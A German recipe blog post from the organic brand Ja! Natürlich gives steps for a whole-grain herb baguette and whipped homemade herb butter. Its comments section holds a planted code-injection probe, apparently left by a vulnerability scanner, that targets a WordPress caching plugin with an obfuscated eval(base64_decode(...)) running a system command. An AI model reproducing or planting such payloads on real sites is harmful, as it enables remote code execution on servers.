Schnelles selbstgebackenes Vollkorn-Kräuter-Baguette

Weiterlesen

Egal wie sehr sich der Tisch schon biegt, ein frisches und saftiges Baguette darf einfach nicht fehlen und macht die Grillage perfekt. Es gibt viele Fertigprodukte für Kräuterbaguette, aber wer weiß schon, was da alles drin steckt? Wie das Getreide für das Mehl angebaut wurde, oder wie es den Kühen geht, die die Milch für die Butter geben? Außerdem sind sie fast immer in Plastik verpackt. Unnötig! Ich habe heute ein schnelles und köstliches Rezept für ein selbstgebackenes Bio-Kräuter-Baguette für euch. Dafür verwende ich wertvolles Bio-Vollkornmehl. Wenn ihr möchtet, könnt ihr das auch noch mit selbstgemachter Kräuterbutter toppen. Beides ist wirklich rasch zu bereitet. Macht doch einfach auch gleich ein bisschen mehr davon und friert es ein, dann seid ihr für die nächste Grillage gewappnet – ganz ohne Fertigprodukte und Plastikmüll.

Schnelles Baguette Zubereitung 1 Schnelles Baguette Zubereitung 1

Zutaten für das Baguette

  • 500 g Ja! Natürlich Bio-Vollkorn-Weizenmehl
  • 15 g frischer Ja! Natürlich Bio-Germ
  • 300 ml warmes Wasser
  • 1 TL Salz
  • 80 g getrocknete Ja! Natürlich Bio-Paradeiser
  • 80 g Ja! Natürlich Bio-Kalamata Oliven (entkernt)
  • 1 Handvoll frische Ja! Natürlich Bio-Kräuter (zB Oregano und Basilikum)

Zutaten für die selbstgemachte Kräuterbutter

  • 2 Becher Ja! Natürlich Bio-Schlagobers
  • 1 Handvoll frische Ja! Natürlich Bio-Kräuter (Petersilie, Schnittlauch)
  • 1/2 TL Salz
Ja! Natürlich Weizenvollkorn-Mehl

Der Weizen stammt ausschließlich von den Anbauflächen des Bio-Landguts Esterhazy in der Region Neusiedler See-Seewinkel, einem der wertvollsten Naturräume Europas. In der Region Neusiedler See-Seewinkel reift das Getreide unter der burgenländischen Sonne mit mehr als 2.000 Sonnenstunden im Jahr zu seinem vollen Geschmack heran auf gesunden, naturbelassenen Böden. Das Getreide wird in der „Steinmüllerei“ der Bio-Mühle Rannersdorf nach einem traditionellen, sehr schonendem Mahlverfahren zwischen Mühlsteinen vermahlen.

erhältlich nur bei BILLA, MERKUR, ADEG und Sutterlüty

Zubereitung:

  1. Zu Beginn Germ in lauwarmem Wasser auflösen. Mehl und Salz vermischen. Anschließend mit Germwasser zu einem Teig verkneten. Dann mit einem sauberen Geschirrtuch abdecken und 30 Minuten gehen lassen.
  2. Währenddessen Oliven, getrocknete Paradeiser und Kräuter fein hacken. Den aufgegangenen Teig nochmal gut mit durchkneten und Kräuter, Paradeiser und Oliven dabei einkneten.
  3. Das Backrohr auf 220°C Ober-Unterhitze vorheizen.
  4. Den Teig zu einem langen Rechteck flach drücken. Längsseite über 2/3 des Teigs einschlagen. Gegenüberliegende Seite ebenso einschlagen und alles festdrücken. Nochmal mittig falten und zu einem Baguette rollen.
  5. Das Baguette mehrmals schräg einschneiden und mit Wasser bestreichen. Nun das Baguette auf ein Backblech legen und 15 Minuten backen. Danach erneut mit Wasser bestreichen und weitere 15 Minuten backen.
  6. Das goldbraun gebackene Baguette aus dem Backrohr nehmen und auskühlen lassen.
  7. Während dem Backen die Kräuterbutter zubereiten. Dazu am besten eine Küchenmaschine verwenden, alternativ klappt es auch mit einem Handmixer.
  8. Die Kräuter waschen und klein schneiden. Schlagobers in eine Rührschüssel der Küchenmaschine geben und mit dem Schlagbesen das Schlagobers schlagen, bis es fest ist. Dann das Salz hinzugeben und weiter rühren – so lange bis sich Butter und Buttermilch voneinander trennen.
  9. Die Buttermilch abgießen, Kräuter zur Butter hinzufügen und weiter rühren. Danach die Butter auspressen, so dass sich die restliche Buttermilch von der Butter trennt. Die Buttermilch kann man z.B. als Getränk genießen. Die fertige Butter in einen wiederverschließbaren Behälter füllen und kalt stellen.

Tipp: Wer weniger Zeit hat, kann natürlich auch unsere Bio-Alpenbutter mit frischen Kräutern mischen.

Dauer: 1 Stunde
Schwierigkeitsgrad: einfach – ihr müsst keine ambitionierten Backmeister sein.
Genuss-Faktor: Darf beim Grillen nie fehlen!

Über Bio-BloggerIn Barbara28 Artikel

Ich bin ursprünglich im schönen Mostviertel aufgewachsen und durfte das Landleben mit all seinen Vorzügen genießen. Die Liebe zum Essen und Kochen hat mir wohl meine Mama schon in die Wiege gelegt. Bei uns zu Hause wurde immer gekocht und gegessen, was Region und Saison zu bieten hatten, und das gilt für mich bis heute. Das Mostviertel habe ich vor ein paar Jahren gegen Wien getauscht [...]

Kommentare (2)

Nessus-1558380819 sagt

wordpress_wp_super_cache_code_execution-1558380819 <!--mfunc eval(base64_decode(c3lzdGVtKCdpZCcpOw)); -->

Nessus-1558380819 sagt

<!--/mfunc--> wordpress_wp_super_cache_code_execution-15583808190

Kommentar verfassen

Absenden

* erforderlich (E-Mail Adresse wird nicht veröffentlicht)